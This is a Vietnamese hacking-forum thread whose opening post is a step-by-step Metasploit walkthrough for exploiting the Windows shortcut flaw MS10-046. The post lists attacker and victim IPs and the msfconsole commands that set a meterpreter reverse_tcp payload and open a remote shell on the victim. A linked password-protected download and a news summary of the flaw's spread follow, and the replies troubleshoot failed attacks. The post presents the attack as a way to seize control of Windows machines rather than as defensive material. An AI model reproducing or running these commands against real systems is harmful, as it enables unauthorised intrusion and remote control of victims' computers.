Trang 1 của 2 12 CuốiCuối
Kết quả 1 đến 10 của 18
  1. #1
    Ngày tham gia
    Aug 2015
    Bài viết
    0

    Exploit - chiếm quyền điều khiển Window (MS10-046)

    [FLASH]http://www.youtube.com/v/AUQ4wgHHYzQ[/FLASH]

    [DOWNLOAD]http://www.mediafire.com/?2nu7rc8jwnhsbbr[/DOWNLOAD]
    Pass : chiaseit.tk
    Tool :
    Name: Metasploit (in Backtrack)
    Version: 3.7 - 4.x
    Home Page: http://www.metasploit.com/
    Download Link: http://www.metasploit.com/download/


    Network Setup:
    Attackers IP: 192.168.1.35 (Linux - Backtrack)
    Victim IP: 192.168.1.90 (XP - Win7 - Window server)
    Gateway IP: 192.168.1.1

    Command:


    root@bt:~# msfconsole
    msf > search lnk
    msf > use windows/browser/ms10_046_shortcut_icon_dllloader
    msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads
    msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
    msf exploit(ms10_046_shortcut_icon_dllloader) > show options
    msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.35
    msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.35
    msf exploit(ms10_046_shortcut_icon_dllloader) > show options
    msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
    msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -l
    msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
    meterpreter > sysinfo
    meterpreter > help
    meterpreter > shell
    Lỗi bảo mật "Shortcut" (MS10-046) được phát hiện 6/2010

    >> Hầu hết máy tính VN có nguy cơ nhiễm virus “Shortcut”

    >> 30.800 máy tính nhiễm virus do lỗi Shortcut

    >> Trojan tấn công vào lỗi nguy hiểm trong Windows



    Biểu đồ theo dõi tình hình “công phá” của các loại virus khai thác lỗi “Shortcut” ​
    Microsoft lẫn các hãng bảo mật đều lên tiếng cảnh báo người dùng lẫn doanh nghiệp lưu ý mức độ nguy hiểm của lỗi này. Trung tâm an ninh mạng Bkis cho biết tính riêng tại Việt Nam đã có đến 30.800 máy tính bị nhiễm virus bắt nguồn từ lỗi "Shortcut". Cả Bkis và Sophos cùng phát hành công cụ ngăn ngừa và quét virus tạm thời trước khi có bản vá chính thức từ Microsoft.

    Lỗi nguy hiểm nằm trong các tập tin "shortcut" (định dạng *.Ink) của Windows, các tập tin này thường nằm ở giao diện desktop hay trình đơn Start. Bằng cách tạo ra một tập tin shortcut nhúng mã độc, tin tặc có thể tự động thực thi mã độc khi người dùng xem tập tin shortcut hay nội dung của một thư mục chứa tập tin shortcut nhúng mã độc.

    Bản vá lỗi có chứa đựng phiên bản mới của tập tin Shell32.dll, đây là phần cập nhật quan trọng. Shell32.dll là một tập tin thư viện rất quan trọng trong Windows, nó chứa đựng một số hàm Windows Shell API. Nếu Shell32.dll bị lỗi hay cập nhật lỗi, máy tính sẽ có tình trạng "Màn hình xanh chết chóc" (Blue Screen of Death - BSOD).

    Tuy nhiên, Microsoft không phát hành bản vá cho Windows XP SP2 và Windows 2000 nó chỉ hỗ trợ cho các phiên bản của hệ điều hành Windows bao gồm: SP3, Vista, Windows 7, Server 2003, Server 2008 và Server 2008 R2.

  2. #2
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    cho hỏi cái demo trên khai thác đc win7 ko vậy bạn.

  3. #3
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    đc hay ko thì còn tùy vào OS nó có update lỗi đó chưa nữa ...

  4. #4
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    đc hay ko thì còn tùy vào OS nó có update lỗi đó chưa nữa ...

  5. #5
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    sao mình làm chẳng ra vậy

  6. #6
    Ngày tham gia
    Dec 2015
    Bài viết
    0
    sao mình làm chẳng ra vậy

  7. #7
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    Bạn xem đã làm theo hướng dẫn chưa ?

  8. #8
    Ngày tham gia
    Aug 2015
    Bài viết
    0
    Bạn xem đã làm theo hướng dẫn chưa ?

  9. #9
    Ngày tham gia
    Nov 2015
    Bài viết
    0
    Trích dẫn Gửi bởi mnewbie
    sao mình làm chẳng ra vậy
    1) OS bạn định khai thác là gì
    2) Níu OS nó đã update thì sẽ ko có kết nối đc thiết lập giữa máy victim và attacker đâu

  10. #10
    Ngày tham gia
    Aug 2015
    Bài viết
    5
    Trích dẫn Gửi bởi mnewbie
    sao mình làm chẳng ra vậy
    1) OS bạn định khai thác là gì
    2) Níu OS nó đã update thì sẽ ko có kết nối đc thiết lập giữa máy victim và attacker đâu

Trang 1 của 2 12 CuốiCuối

Các Chủ đề tương tự

  1. [Thủ Thuật] Chiếm quyền quản trị Win 8, Chiếm quyền Administrator bằng Win 8
    Bởi bevoll trong diễn đàn Thủ thuật - Hướng dẫn phần mềm
    Trả lời: 0
    Bài viết cuối: 12-12-2015, 08:52 PM
  2. Trả lời: 0
    Bài viết cuối: 12-24-2014, 03:59 AM
  3. ONG BAK Trilogy Collections 720p BluRay DTS x264 ~ Chiến Binh Quyền Thái ~ Tony Jaa
    Bởi mrtho88hnn trong diễn đàn Hành động - Chiến tranh
    Trả lời: 0
    Bài viết cuối: 05-16-2013, 02:11 AM
  4. Trả lời: 0
    Bài viết cuối: 02-15-2013, 03:54 PM
  5. Trả lời: 0
    Bài viết cuối: 12-21-2012, 11:18 PM

Quyền viết bài

  • Bạn Không thể gửi Chủ đề mới
  • Bạn Không thể Gửi trả lời
  • Bạn Không thể Gửi file đính kèm
  • Bạn Không thể Sửa bài viết của mình
  •